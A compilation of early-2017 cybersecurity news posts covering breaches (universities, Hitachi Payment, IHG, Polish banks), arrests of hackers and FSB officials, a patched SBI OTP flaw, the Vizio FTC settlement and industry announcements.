Sunday, 26 February 2017

Microsoft opens Cybersecurity Engagement Center in Mexico

Microsoft has announced the opening of what it calls a Cybersecurity Engagement Center in Mexico. This will join the Transparency and Cybersecurity Center for Asia-Pacific, as well as the one in India, and its Redmond Cybercrime Center.
The complex, based in the country's capital city, will serve Mexico as well as other Latin American countries, in an effort to use technology, experience, and services to protect citizens and companies from an array of cyber threats.
As highlighted in the post, some of the main objectives of this facility are:
  • Taking advantage of Microsoft’s proactive role in matters of fighting cybercrime, particularly in the dismantling of criminal organizations that operate through Botnet schemes
  • Allowing cybersecurity experts from Mexico and elsewhere in Latin America to work with Microsoft specialists to fight cybercrime together
  • Acting as a headquarters for the development of training activities in order to support the building and strengthening of technical capabilities; these activities are geared toward authorities and the public sector
According to Jean-Philippe Courtois, Executive VP and President, Microsoft Global Sales, Marketing and Operations, this newly opened complex will work in tandem with the software giant's Redmond-based Cybercrime Center opened back in 2013. The Cybercrime Center was unveiled after the merger of the digital crimes and software piracy teams, which employed 30 staff at the time, collaborating with over 70 individuals worldwide to locate and fight hacker threats and malware.
Microsoft stated it is committed to invest in Latin America, by bringing over its cybersecurity capabilities to help governments identify "current threats that affect the economy’s prosperity". To make good on its promise, the company will use its "robust and trustworthy cloud computing" platform to fight cyber threats, as it has done in the past.
In concert with the opening of the facility, a Government Security Program was signed between the Redmond giant and the Federal Police (representing the Mexican government) to promote IT security. What this does is it gives participating authorities "access to the source code for current versions of Windows and Windows service packs, Windows Embedded CE, and Microsoft Office".
It is not the first time Microsoft has collaborated with authorities on this issue, as the company helped bring down the ZeroAccess botnet in conjunction with the FBI and Europol a few years ago.

63 Universities and US Government agencies breached by hacker

A “Russian-speaking and notorious financially-motivated” hacker, Rasputin has reportedly hacked the computer systems of various universities and government agencies of US and sold the stolen data on the dark web.

According to the cyber security research firm,  Recorded Future, the hackers gained access to computer systems of more than 63 universities and federal, state, and local U.S. government agencies. The prominent universities include Cornell and New York University.

The firm claimed that the victims are “intentional targets of choice based on the organization’s perceived investment in security controls and the respective compromised data value. Additionally, these databases are likely to contain significant quantities of users and potentially associated personally identifiable information (PII).”

The list of the Rasputin's targets are quite long and it does extend to the 10 U.K university and one Indian University in Delhi as well. All the hacked agencies and universities have been informed about the hack by the Recorded Future's researchers.

The victims include 16 U.S state government, 6 U.S. cities and four federal agencies, Child Welfare Information Gateway, which is operated by the U.S. Department of Health and Human Services, and   Fermi National Accelerator Laboratory, America’s premier particle physics lab. The severity of the breaches are unclear

The List of U.S University victims: Cornell University, University of the Cumberlands, VirginiaTech, Oregon College of Oriental Medicine, University of Maryland, Baltimore County, Humboldt State University, University of Pittsburgh, The University of North Carolina at Greensboro, New York University, University of Mount Olive, Rice University, Michigan State University, University of California, Los Angeles, Rochester Institute of Technology, Eden Theological Seminary, University of Tennessee, Arizona State University, St. Cloud State University, NC State University, University of Arizona, Purdue University, University at Buffalo, Atlantic Cape Community College, University of Washington.

The list of U.K University Victims: University of Cambridge, Coleg Gwent, University of Oxford, University of the Highlands and Islands, Architectural Association School of Architecture, University of Glasglow, University of Chester, the University of the West of England, University of Leeds, The University of Edinburgh.

And one Indian University: Delhi University.

Hackers could easily bypass SBI's OTP security

One Time Password (OTP) has become the new security feature on most of the websites, including the banks. This feature allows a user to make online transactions after the identity of the customer is verified by putting the OTP password sent to the registered mobile number from the bank. But who knew this security feature could be easily bypassed and lead to huge loss of money.

A white-hat hacker, bug bounty hunter and web application security researcher, Neeraj Edwards shared his research on how he could easily bypass the OTP of one of the most popular bank, State Bank of India (SBI) and could make the transaction with any amount.

While making a transaction, the last page of SBI’s website shows a One Time Password screen where there is a parameter called ‘smartotpflag is set to Y i.e. smartotpflag=Y’.

Smartotpflag parameter is used to generate OTP, and Y represents ‘yes’ to send the code to the registered mobile. However, the risk factor arises if someone changes ‘Y’ to ‘N’ which means ‘No’. The transaction then will be completed without entering the OTP.

Though after Edwards discovery, the vulnerability was patched but it was highly disappointing that the person who could have easily benefited from this vulnerability, but choose not to, was neither rewarded nor acknowledged for his work.

The press too could not make this important news to the papers, thus keeping the public in dark and keeping the discoverer from any achievement.

Spies Hack Israeli Soldiers' Android Phones

More than 100 soldiers from the Israel Defense Forces (IDF) have become the target of a cyberespionage group when information from their mobile devices was stolen using malicious Android applications.

ViperRAT, the clandestine hacking collective was found actively hijacking soldiers’ Android-based smartphones to remotely siphon images and audio directly from the devices.

Highly sophisticated malware allowed the attackers to control each phone’s microphone and camera. In effect, the hackers could eavesdrop on soldiers’ conversations and peer into live camera footage — wherever an affected smartphone’s camera would be pointed, that vantage point could have also been viewable to the hackers.

A list of installed apps on the infected mobile device is also sent out by the dropper. Some variants will pretend to be chat apps, another variant will pretend to be a YouTube layer, depending on what's already installed on the device.

Other Android smartphone applications common to Israeli citizens and available in the Google Play store — including a billiards game, an Israeli Love Songs player, and a Move To iOS app — where found to contain hidden ViperRat malware.

While the malicious actors behind ViperRAT have yet to be explicitly identified, their activity patterns suggest that the cyberespionage is being carried out by a group operating out of the Middle East.

Google looks to hire Australian hackers

Google is searching for Australia’s best and brightest hackers to employ them for hard-to-fill cyber security positions at the search giant’s own business. The tech giant's Australian hiring raid may likely exacerbate the IT skills shortage in government agencies.

This step has been taken by the Google because of a difficulty in finding the right mix of people to take up cyber security positions. Despite the various specialised courses offered by Australian universities, not many appear to be interested in taking up the courses. The number of people taking up information and communications technology degrees has halved over the last decade according to the Government's Cyber Security Strategy.

Moreover, “it’s difficult to find such people who have the skills of hacking into a system but ultimately want to make it more secure and not use those skills negatively and are also willing to work in a big software company,” said Google Chrome’s security head, Parisa Tabriz.

The shortage can also be felt by Google which is now looking to hire as many quality cyber security positions in Australia as it can.

But Google’s gain could be government’s loss. The federal government expects demand for cyber security services and related jobs — such as legal services, insurance and risk management — will grow by at least 21% over the next five years.

The government services though have been competing with private firms on salaries. It is a common problem for governments across the globe when attempting to attract people for jobs, to fall short of being able to provide the kind of salaries and perks that private firms serve up to prospective employees.

Two weeks ago, the giant US-based telco Verizon announced it has strengthened its armoury in the fight against cyber adversaries with its investment in next-generation security capabilities at its Asia-Pacific Advanced Security Operations Centre in Canberra.

The opening of the new security centre followed Verizon’s appointment last December to the federal government’s new whole of government telecommunications services panel which provides coordinated telecommunications services.

Thursday, 16 February 2017

Hitachi Payment services accepts its systems were compromised

Hitachi payment Services conducted an audit regarding security breach that had compromised about 3.2 million credit cards issued by Indian banks in October 2016, after Reserve bank of India ordered an audit four months back.

The company confirmed on Thursday that their system was affected by "a sophisticated injection of malware (malicious software code)", that hampered detail of debit cards issued by banks.

Hitachi Payment Services, a firm that provides ATMs, point of sale and other services in India, said security audit firm SISA Information Security has completed its final assessment report on the breach and discovered  that the highly sophisticated malware had worked undetected and concealed its tracks during the compromise period between May 21 and July 11 , 2016.

“While the behavior of the malware and the penetration into the network has been deciphered, the amount of data ex filtrated during the above compromise period is unascertainable due to secure deletion by the malware,” said a statement released by Hitachi Payment Services.

According to the National Payments Corporation of India (NPCI), which looks at payment system in India discovered that almost 90 ATMs in the country were compromised through malware and least 641 customers across 19 banks lost Rs 1.3 crore to fraudulent transactions on their debit cards.

Loney Antony, managing director of Hitachi Payment Services said, “…we confirm that our security systems had a breach during mid-2016. As soon as the breach was discovered, we followed due process and immediately informed the RBI, National Payments Corporation of India (NPCI), banks and card schemes. We also partnered with banks to ensure the safety of their customers’ sensitive data. As a result, the extent of compromise was limited and we have not seen any further misuse due to the containment measures deployed by Hitachi Payment Services"


The hacker group in the Russian Federation, whose members are under the radar of stealing funds from accounts of Russian financial institutions, was dismantled. The Spokesman of the Ministry of Internal Affairs of the Russian Federation Irina Wolf stated.

"In May 2016, after effective interaction between the Ministry of Internal Affairs and the Federal Security Services the Russian Federation, an unprecedented interdiction operation had been carried out against the hacker group, whose members had lived in 17 different locations of the country and had been a part of misappropriation of funds from accounts of Russian financial institutions since 2013, Wolf stated in the report, published on the website of the Ministry of Internal Affairs. For the period of its activity, 50 members had managed to transfer more than 1 billion rubles."

The Spokesman of the Ministry of Internal Affairs added to her statement that other than bank accounts, attackers had also hacked critical infrastructure, including strategic industrial enterprises. 

Searches were conducted, during which computers, media devices and means of communication, as well as funded and edged weapons were seized.

"At the moment 27 organizers and participants of the group, of this 19 suspects, held criminal liable. The court had ordered their remand in custody", - the statement reflected on the website. The matter remains under investigation.

Friday, 10 February 2017

Feds Bust Alleged Russian Bank Hacker in Los Angeles

A federal investigation into a Russian cybercrime ring led Secret Service agents to the doorstep of a 29-year-old Los Angeles man the United States calls an “extremely sophisticated and well-connected cybercriminal” who allegedly used malware to steal cash from thousands of U.S. bank accounts.
Alexander Tverdokhlebov was arrested in an early-morning raid Feb. 1 on a four-count wire-fraud indictment alleging that he worked with a Russian colleague in 2009 and 2010 to attack U.S. financial institutions. He allegedly used a botnet of 10,000 hacked PCs.
Tverdokhlebov is being held in the Metropolitan Detention Center in Los Angeles pending a bail review in Alexandria, Virginia, where he’s charged.
Long before the Kremlin was known for hacking political campaigns, Russian hackers and their peers in Ukraine dominated the for-profit cybercrime underworld, from the large-scale credit-card heists of the mid-2000s to today’s ransomware threat. And banking botnets have been a staple of Russian cybercrime for nearly a decade.
Instead of stealing passwords for a hacker to use later, the malware will wait for the victim to log in to their online banking, then splice itself into the connection and slip in a rogue funds transfer without setting off alarms at the bank. If the victim happens to check their balance or transaction history, the malware will even rewrite it on the fly to conceal the theft.
The Russian-made Zeus malware first proved the concept in 2009, and is behind, by some estimates, billions of dollars in losses over the years. Zeus’s alleged author, Evgeniy Bogachev, was even among the Russians sanctioned by President Obama last December in retaliation for the Kremlin’s election hacking, and the FBI has a $3 million reward out for his arrest.
The U.S. discovered Tverdokhlebov while examining the online chats of a different Russian: Vadim Polyakov, a 32-year-old St. Petersburg man who pleaded guilty last year to a million-dollar concert-ticket scam. Polyakov ran a crime ring that hacked consumers’ StubHub accounts to buy thousands of e-tickets for resale. He was arrested in Spain and extradited to the U.S. In July, a New York judge sentenced him to four to 12 years in state prison.
Court records don’t indicate how the Secret Service obtained Polyakov’s ICQ chat logs. The most likely scenario is that Spanish authorities seized Polyakov’s laptop at his arrest. In any event, the chat logs showed Polyakov conversing in Russian with a fellow cyberthief who let slip enough information to identify Tverdokhlebov as a suspect, specifically his first name, his girlfriend’s full name, and his home address and his phone number.
The indictment against Tverdokhlebov is based entirely on the years-old chats, with no hard information about specific thefts, suggesting that the feds are using it as a wedge to try and pry more evidence from Tverdokhlebov’s arrest and the search of his computers.
Over government objections, a magistrate judge set Tverdokhlebov’s bail at $100,000 last week but stayed the man’s release pending a government appeal, set to be heard in Virginia on Friday. The feds are urging that Tverdokhlebov be held without bail, claiming that he has few ties to the U.S. and enough underworld contacts to flee to Mexico and from there to Russia.
Tverdokhlebov was born in Russia and obtained U.S. citizenship in 2009 after marrying an American. According to prosecutors, the two have since divorced.
Secret Service agents have spent the days since Tverdokhlebov’s arrest opening his safe-deposit boxes. Three boxes in California were packed with $172,000 in $100 bills. A key locked in one box turned out to fit a fourth safe-deposit box in Las Vegas, where on Tuesday the feds found an additional $100,000.
“The large quantity of cash, as well as their distribution in safe-deposit boxes in different states, suggests that defendant may have concealed funds elsewhere in preparation for flight,” prosecutors wrote, urging that Tverdokhlebov be kept in jail.
Tverdokhlebov’s attorney, William Cummings, countered in a filing Thursday that his client is legitimately employed in Los Angeles and that the charges in the Virginia indictment are old.
Cummings also implied that with every cash-filled safe deposit box the feds find, his client becomes an even better candidate for pre-trial release. “The defendant, if he were on release, could now not go to Las Vegas to access that money,” he wrote.

nullcon Information Security Conference 8Bit, Goa 2017

nullcon‍ was founded in 2010 with the idea of providing an integrated platform for exchanging information on the latest attack vectors, zero day vulnerabilities and unknown threats. Our motto - "The neXt security thing!" drives the objective of the conference i.e. to discuss and showcase the future of information security and the next-generation of offensive and defensive security technology. The idea started as a gathering for researchers and organizations to brainstorm and demonstrate why the current technology is not sufficient and what should be the focus for the coming years pertaining to information security. In addition to security, one of the section of the conference called Desi Jugaad (Hindi for "Local Hack") is dedicated to hacking where we invite researchers who come up with innovative security/tech/non-tech solutions for solving real life challenges or taking up new initiatives.

The nullcon conference is a unique platform for security companies/evangelists to showcase their research and technology. Nullcon hosts Prototype, Exhibition, Trainings, Free Workshops, null Job Fair at the conference. It is an integrated and structured platform, which caters to the needs of IT Security industry at large in a comprehensive way.

The event consists of 25 speeches and 11 training sessions, which cover all major topics of IT security industry. The conference is created for security companies/enthusiasts so they can showcase the most up to date research and technology on the topic. The shared knowledge is usually used afterwords within the organizations. Moreover, we host ExhibitionFree WorkshopsCTF Hacking competitionsJob FairBlackShield Awards and other events at the conference.

The Keynote will be addressed by Joshua Pennell, Founder & President, IOActive, following which we would have talks by various international security researchers on topics such as, ATM Hackings, Drone Hijacking, Telecom Protocol Security, Blockchain issues, Cloud Security, Bug Hunting, Social Engineering, Botnets and lots more.

With nullcon 8-bit edition we have made a lot of changes bringing the conference to the next level:
  • We anticipate to have 1000 people,
  • Additional DevOps Security Track,
  • New Trainings on Cloud Security, IoT, Infrastructure, Hardware Security,
  • New CXO Panel session,
  • Larger exhibition vendor area etc.

Nullcon Goa 2017 Dates:
  • Training - 28th Feb to 2nd March 2017
  • Conference - 3rd to 4th March 2017

New Venue:
Holiday Inn Resort, Mobor Beach, Cavelossim, Salcette, Goa - India.
Registartion is still open! Get your pass here:

Thursday, 9 February 2017

Closing the Loop in Cyberspace

CyberBit, the cyber technology company established by Elbit Systems under the direction of Adi Dar, implements in cyberspace a proven military concept: prompt loop closure to contain cyber events. For some time now, the cyber technology industry has been discussing the need to operationalize the cybersecurity process. The idea here is that a company that accomplished that objective on the battlefield would be able to accomplish it in cyberspace, too.
"CyberBit implements a holistic cybersecurity concept, based on four primary elements: intelligence gathering, data analysis, command & control and an enforcement capability," explains Adi Dar, CyberBit's CEO. "Elbit Systems have been involved in cyber technology for more than 15 years. It began with the acquisition of Elron Telesoft in 2001 and the establishment of Elbit's ISTAR Division, and evolved in April 2015 into CyberBit. Back then, they did not call it cyber technology, but the foundations had been cast years ago.
"The establishment of CyberBit followed a management decision to offer Elbit Systems' cyber technology capabilities to the civilian market, too, and to leverage Elbit Systems' cyber technology assets for that end. In the civilian world, you must operate differently. You need unsupervised freedom of operation, you have to develop a brand, stay innovative and respond promptly. In the defense/security world, Elbit is a solid brand, but that does not help if you want to sell a cybersecurity solution to a bank, an insurance company or a retail chain.
"For this reason, CyberBit is made up of two sub-units – one sells products to the HLS world and the other to the civilian world. The company that sells to the civilian world is unsupervised and its employees do not have to undergo a security vetting process. It uses a separate IT network and is run like any other cyber technology company around the world."
"One of the moves we made was the acquisition, in July 2015, of the cyber technology division of the NICE Company," explains Dar. "This move had matured three months after the establishment of CyberBit. The idea was to acquire the assets of the NICE Company in the field of intelligence gathering, combine them with Elbit's knowledge management and C3 capabilities, and combine all of that with the assets of the 4C Company Elbit had acquired back in 2011."
One of the solutions CyberBit offers belongs in the EDR (Endpoint Detection & Response) category. It is a client installed in a core-level workstation/server, under the operating system. It "sees" and records a lot of the processes taking place in the computer. The data from all of the clients throughout the organization are collected by a Big Data system, and used to run algorithms that search for patterns indicating a cyberattack.
"Each workstation produces dozens of megabytes per day," explains Dar. "If the organization has 100,000 workstations, it will amount to a lot of data that should be managed and analyzed every day. Not many companies in this field can accomplish that on such a scale.
"The ability to analyze the data from all of the workstations in the network makes it possible to identify a pinpoint attack against a specific workstation, and mainly to identify attacks where the attacker moves laterally through the network. Pursuant to the identification stage, the client may be issued with an enforcement command to kill processes in that workstation. In this way, the threat is contained very quickly. The combination of a client at the core level and Big Data capabilities gives us an advantage in the market."
Along with collection of intelligence from the clients fitted to the organization's workstations and servers, CyberBit offers legitimate intelligence gathering solutions, which include Open Source Intelligence (OSInt) and intelligence gathering capabilities for stationary or mobile communication networks, including satellite communication networks. "Combining all of these activities enables us to provide a systemic intelligence gathering solution – from the organization and from the outside environment. This improves the organization's ability to identify cyberattacks," says Dar.
Another solution is a SOC (Security Operations Center) management system: a system for managing the organizational cybersecurity operations center, intended to provide transparency into the organization's networks. The SOC should effectively manage the response to cyberattacks.
"This product enables automation of the SOC procedures," explains Dar. "These centers are normally manned by people just starting out in the world of cyber technology. They come to work there for a short period of time, hone their professional skills and leave. Moreover, major organizations deploy multiple SOCs at various locations around the world, so as to avoid overtime pay. It is known as 'Follow the Sun'. When the sun sets over one country, it rises over another country, and the management of the SOC follows the sun.
"If you combine these two elements vis-à-vis the fact that a high-quality cyberattack against an organization can last months, you will realize that without automation of the SOC procedures, the organization will not be equipped to cope effectively with such an attack. At this point, Elbit's experience in the C3 world comes into the picture. In the end, you are talking about numerous sensors that produce logs, and you need an application with a rules engine to provide the analysts at the SOC with a scale of priorities."
Another field of activity in which CyberBit is involved is cybersecurity for SCADA (Supervisory Control and Data Acquisition) infrastructures. These are assets the 4C Company had brought into Elbit Systems. "In SCADA networks, we perform passive monitoring along with the ability to stop inline attacks," says Dar. "The OT system world is simpler than the IT world as it has a finite number of protocols. It is a more structured world. At the same time, since the Stuxnet worm was identified and the electrical infrastructure of the Ukraine was attacked in December 2015, there has been more understanding of the significance of the threat. This is the reason why many countries are developing regulation in the field of SCADA security."

Replacing Anti-Virus Software

According to Dar, one of the threats that currently challenges the industry is ransomware. "This is a threat that compels you to resort to real-time blocking, even before the encryption, but it is very difficult to catch before the encryption. If you catch it after the encryption, you will have no guarantee about being able to save the information – and that is a fairly complex challenge.
"Ransomware changed the demands of the clients, and now they want response – not just detection. It is nice if you managed to detect it, but what will the organization do with it? And in order to respond, you need a client on the computer. That leads to a war over the clients. I had a meeting with an information security manager of a bank, who told me that they have nine clients on the computer. The battle today is over the 'real estate' in the workstation or server. Ransomware can damage a large number of end stations, and even servers. We know how to contain the infected devices so as to prevent the threat from spreading. According to some of the estimates in the market, this technology will replace anti-virus software."
Unlike the defense industry, which has a well-defined and relatively 'niche type' target market, with civilian cybersecurity solutions the market is endless. Private clients, SMBs or major clients in every country around the world already need or will need cybersecurity solutions.
"There will be no escaping the transfer of cybersecurity solutions to the cloud," says Dar. "If I could place the EDR in the cloud, while at the same time installing it in all of the client's devices, I would have solved a major percentage of the client's problems. One must understand that smaller organizations do not have an information security team or an SOC. Cybersecurity for SMBs (Small to Medium Businesses) must be provided through their cloud information security service provider or MSSP (Managed Security Service Provider). I am referring to cybersecurity services for organizations with a personnel of 100-150 employees or less that cannot afford to finance more expensive solutions.
"CyberBit is not there yet, but we understand that this is the right direction. We can see a trend of transition to the cloud, although the truly sensitive information as well as the client of the EDR are not being transferred to the cloud yet. That will take time. Soon we will have to make a decision as to whether we want to remain a provider of technology exclusively, or provide cloud services as well.
"It is important to note that CyberBit does not compete against defense/security industries that offer cyber technology products, but against civilian cyber technology companies. For a defense/security industry it is inconceivable to provide cloud services to SMBs. For us it is a very realistic question. It is a part of our future. Elbit Systems established CyberBit in order to develop a civilian cyber technology industry, and the future of that industry is in the cloud and in mass-produced solutions, like anti-virus software. That's where the money is."

InterContinental Hotels Confirms Credit Card Breach

InterContinental Hotels Group (IHG), parent company to Crowne Plaza, Holiday Inn and Kimpton Hotels and Resorts, confirmed on Friday a breach of payment card systems used in 12 of its hotels located in North America and the Caribbean.
According to IHG, which operates 5,000 hotels worldwide, malware was found on servers used to process credit cards. The servers were infected between last August and December; the company declined to say how many payment cards were impacted.
In a statement released Friday, IHG said it found malware installed on servers used at popular destinations such as Michael Jordan’s Steak House and Bar in Chicago, the Holiday Inn San Francisco Fisherman’s Wharf, the Copper Lounge in Los Angeles, and the Palm Bar in Aruba. A full list of locations impacted was posted by IHG.
The hotelier reported on Dec. 28 that it was investigating customer complaints of unauthorized charges on credit cards. At the time, the company said only a limited number of destinations were impacted before revealing more details on Friday.
“Findings show that malware was installed on servers that processed payment cards used at restaurants and bars of 12 IHG managed properties,” according to a statement. “Cards used at the front desk of these properties were not affected.”
According to IHG, the malware searched for magnetic stripe track data as it was being routed through servers. Track data included cardholder name, card number, expiration date and internal verification code. There is also no information provided on the strain of malware used in the attacks.
Hotels, restaurants and other hospitality outlets are frequently singled out as victims of opportunistic hackers. Last year alone there were nearly a dozen reports of card breaches. One of those breaches occurred in August and included 20 hotels run by HEI Hotels and Resorts, which owns chains Marriott, Sheraton, and Westin. Similarly, malware was used to siphon payment card data.
The prevalence of malware use to steal payment card data hit a peak in 2014 when it was at the center of several high-profile breaches, including Target and Neiman Marcus.
As recently as last November, security researchers at Trustwave said the Carbanak cybercrime gang, first discovered by Kaspersky Lab, had shifted strategy and began targeting the hospitality and restaurant industries with new techniques and malware. Part of the Carbanak tactics involved targeting hospitality call centers with elaborate ploys to get customer service representatives to accept and download emails with malicious macro-laced documents. The target was credit card data scraped from the memory of point-of-sale systems.
“We have been working with the security firms to review our security measures, confirm that this issue has been remediated, and evaluate ways to enhance our security measures,” IHG wrote in a statement regarding the breach.

Smart TV Manufacturer Vizio Fined $2.2M for Tracking Customers

Smart TV manufacturer Vizio tracked data on 11 million of its customers TVs without their knowledge or consent, the Federal Trade Commission announced this week.
The Irvine, Calif.-based company agreed on Monday to pay $2.2 million to settle charges that it collected scores of its customers’ data. While the company tracked what programs users watched it also tracked information corresponding to customers’ sex, age, income, marital status, household size, education level, home ownership and household value.
According to a complaint filed by the agency in the U.S. District Court for the District of New Jersey on Monday, Vizio tracked users through proprietary automated content recognition (ACR) software made by a subsidiary, Inscape Services. While that software has been turned on by default since 2014 on most of Vizio’s televisions, the FTC alleges that in some instances the company remotely installed it on any previously sold televisions that didn’t have the software.
The software feeds Vizio a “second-by-second” transmission on what its consumers watch, regardless of whether its on cable, on demand, a streaming device like Google’s Chromecast or Amazon’s Fire Stick, or even a DVD. According to the complaint, the software has quite the reach and is able to capture “up to 100 billion data points each day from more than 10 million VIZIO televisions.”
In addition to household demographics, the software also siphoned up technical details such as the home’s IP address, wired and wireless MAC addresses, how strong the home’s WiFi was, and even any nearby WiFi networks, the complaint (.PDF) reads.
The complaint alleges the company sold this information to third party companies who first used it to analyze the effectiveness of advertising, and then used it in targeted advertising.
“Defendants provide these third parties with IP addresses, so that the third parties can analyze a household’s behavior across devices, in order to determine, for example, (a) whether a consumer has visited a particular website following a television advertisement related to that website, or (b) whether a consumer has viewed a particular television program following exposure to an online advertisement for that program. The data is used in the aggregate to evaluate the effectiveness of advertising campaigns,” the complaint reads.
The company failed to provide users with any notice their viewing habits were being tracked. It wasn’t until March 2016 – in the midst of investigations against the company – that Vizio sent users a quick pop-up notification on their television notifying them their viewing data was being collected.
“This notification timed out after 30 seconds without input from the household member who happened to be viewing the screen at the time, and did not provide easy access to the settings menu,” the complaint reads.
Going forward the company is being asked to disclose and obtain consent for any information it collects in the future, maintain transparency when it comes to what its doing with its customers’ information, and to develop a data privacy program subject to assessment every two years.
As part of the settlement Vizio is also being asked to erase any data it may have collected before March 1, 2016. Of the $2.2 million paid to settle the matter, $1.5 million will go to the FTC, another $1 million to the New Jersey Division of Consumer Affairs, with $300,000 of that amount suspended.
Vizio, for its part, issued a press release shortly after the settlement was announced on Monday saying it was “pleased to reach this resolution” and that it set a “new standard for best industry practices,” At the same time the also company took a moment to clarify exactly what kind of customer information its ACR program gathered.
According to Jerry Huang, Vizio’s General Counsel, the program didn’t pair viewing data with personally identifiable information; instead, as the complaint specifies, it was used “in the ‘aggregate’ to create summary reports.”
“VIZIO is pleased to reach this resolution with the FTC and the New Jersey Division of Consumer Affairs. Going forward, this resolution sets a new standard for best industry privacy practices for the collection and analysis of data collected from today’s internet-connected televisions and other home devices,” stated Jerry Huang, VIZIO General Counsel. “The ACR program never paired viewing data with personally identifiable information such as name or contact information, and the Commission did not allege or contend otherwise. Instead, as the Complaint notes, the practices challenged by the government related only to the use of viewing data in the ‘aggregate’ to create summary reports measuring viewing audiences or behaviors.”
“Today, the FTC has made clear that all smart TV makers should get people’s consent before collecting and sharing television viewing information and VIZIO now is leading the way,” concluded Huang.
In the FTC’s eyes, Vizio’s statement runs counter to a securities filing previously filed by the company. In the filing, Vizio claims its data analytics program “provides highly specific viewing behavior data on a massive scale with great accuracy, which can be used to generate intelligent insights for advertisers and media content providers.”
The FTC’s Acting Chairman Maureen K. Ohlhausen said Monday that Vizio’s practices, specifically how it failed to disclose the fact it was tracking users, were unfair and deceptive.
“Evidence shows that consumers do not expect televisions to collect and share information about what they watch. Consumers who are aware of such practices may choose a different television or change the television’s settings to reflect their preferences,” Ohlhausen wrote. (.PDF) ”
The FTC filed a complaint against another major technology company, D-Link, earlier this year. In that complaint, the agency alleged the router manufacturer failed to adequately secure its wireless routers and IP cameras, something that could have potentially put its customers’ data at risk of compromise.

Wednesday, 8 February 2017

Polish banks hit by malware sent through hacked financial regulator

Polish banks are investigating a massive systems hack after malware was discovered on several companies' workstations.
The source of the executables? The sector's own financial regulator, the Polish Financial Supervision Authority (KNF).
A spokesman for the KNF confirmed that their internal systems had been compromised by someone "from another country". But when it was discovered that the regulator's servers were hosting malicious files that were then infecting banks' systems, the decision was made to take down the KNF's entire system "in order to secure evidence."
According to one cyber security site that spoke to a number of banks and carried out a preliminary analysis, a number of banks confirmed that they had seen unusual network traffic and found encrypted executables on several servers. The details were rapidly shared between the group of roughly 20 commercial banks in the country and other banks started reporting the same issues.
Ironically, it is the KNF that sets cybersecurity standards for Polish banks but it is thought that a modified JS file resulted in visitors to the regulator's site loading an external JS file which then pulled down malicious payloads.
Both the KNF and the Polish government have since told local Polish media that there is no indication that people's money was touched and have given tentative assurances that no operations were affected. But they also stressed that investigations were ongoing.
The situation is being seen as the most serious ever attack on the Polish banking industry

Sophos to assimilate Invincea's intelligent machine tech to fight malware

 Robot eye opens. Image via Shutterstock
Sophos has announced a deal to acquire the core technologies of anti-malware protection outfit Invincea for $100m plus up to $20m, dependent on first-year revenues.
Invincea makes a line of signature-less endpoint procession technologies that rely on machine learning and behavioural monitoring to block malware.
Sophos plans to integrate Invincea's tech into the Sophos Central endpoint product line, before releasing revamped products later his year. The plan parallels the integration of SurfRight's technology into Sophos's product line following a smaller December 2015 acquisition.
In the 12 months to 31 March 2016, Invincea recorded billings of $13.4m, revenue of $9.8m and a loss before tax of $11.8m.
Invincea Labs, a division of Invincea that has been separately managed and operated since 2010, will be spun out prior to the acquisition and does not form part of this transaction.
Sophos expects to complete the acquisition around the end of this fiscal year. It anticipates the deal to be "broadly neutral" to its balance sheet in its first year before adding to its revenues thereafter.
Sophos CEO Kris Hagerman commented: "Invincea is leading the market in machine learning-based threat detection with the combination of superior detection rates and minimal false positives. Invincea will strengthen Sophos's leading next-gen endpoint protection with complementary predictive defences that we believe will become increasingly important to the future of endpoint protection and allow us to take full advantage of this significant new growth opportunity."

Cyberbit to Launch Cybersecurity Training Facility in Japan

Together with Ni Cybersecurity, Elbit Systems' subsidiary will launch a cybersecurity training and simulation center in Tokyo, addressing the growing cybersecurity skill shortage before the 2020 Olympics
Elbit Systems announced today that its subsidiary Cyberbit was awarded a contract from Ni Cybersecurity, the Japanese cybersecurity service provider, to launch a cybersecurity training and simulation center in Tokyo powered by the Cyberbit Range platform.
Ni Cybersecurity will set up a training facility in Toranomon, Tokyo that will address these challenges by accelerating the certification of new cybersecurity experts and helping organizations improve the skills of their existing staff, focusing on government and finance organizations. The contract, in an amount that is not material to Elbit Systems, will be performed during 2017.
The new training facility will be powered by the Cyberbit Range, a cybersecurity training and simulation platform. It enables trainees to practice in real-life settings by accurately replicating their network setup, using their actual security tools and simulating their typical network traffic. The Range provides a selection of simulated attack scenarios, including ransomware. It is the underlying platform for multiple training centers in North America, Asia and Europe.
Adi Dar, Cyberbit’s CEO said, “When there is a need to certify tens of thousands of new cybersecurity experts while improving the skills of existing ones, all within a very short timeframe, enrollment in simulated training programs is the best choice for finance, government and other organizations in Japan. I am confident that the initiative, led by Ni Cybersecurity, powered by our Range platform, will contribute to Japan’s cyber readiness for the 2020 Olympic Games, and for years to follow."
Takeshi Mitsuishi, President and CEO of Ni Cybersecurity, said, “We selected the global leading cyber range platform, and we’re taking it to the Japanese market by opening our new training center in Tokyo, launching in Toranomon. Based on the global success of the Cyberbit Range, our customers can expect exceptional quality training, faster certification, and overall more qualified and skilled cyber security personnel.”

Sunday, 5 February 2017


Two of Moscow’s top cybersecurity officials are facing treason charges for cooperating with the CIA. The accusations further highlight intrigue to a mysterious scandal that has had the Moscow rumour mill working in overdrive for a past week now, and come not long after US intelligence accused Russia of interfering in the US election and hacking the Democratic party’s servers.

Sergei Mikhailov was deputy head of the FSB security agency’s Centre for Information Security. His arrest was reported in a series of leaks over the past week, along with that of his deputy and several civilians.

According to earlier reports in the Russian media, Mikhailov was arrested some time ago, in theatrical fashion, during a plenary session of the top FSB leadership: a bag was placed over his head and he was marched out of the room, accused of treason.

His deputy, Dokuchayev, is believed to be a well-known Russian hacker who went by the nickname Forb, and began working for the FSB some years ago to evade jail for his hacking activities. Together with the two FSB officers, Ruslan Stoyanov, the head of the computer incidents investigations unit at cybersecurity firm Kaspersky Lab, was also arrested several weeks ago.

Kaspersky confirmed last week that Stoyanov had been arrested and was being held in a Moscow prison, though it said the arrest was not linked to his work for the company. Interfax said four people had been arrested and a further eight were potential witnesses in the case.

On Tuesday, Life, an online news portal with close links to the security services, reported that FSB agents had searched Mikhailov’s home and dacha and found more than $12m (£10m) in cash stashed in various hiding places.

Two arrested in London over hacking of US cctv systems days before President Trump’s inauguration took place

Detectives have arrested two people in London on suspicion of hacking Washington's CCTV system ahead of President Donald Trump's inauguration.
The home of a British man, aged 50, and a Swedish woman, also 50, was raided in Streatham, south London on January 19.
It comes as storage devices which record data from police surveillance cameras in the American capital were allegedly compromised between January 12 and 15.
Hackers disabled 123 of 187 security cameras in Washington, starting a major security incident.
It is believed the first cyber attack could have been a dry run with another potentially planned during the presidential handover.Donald Trump

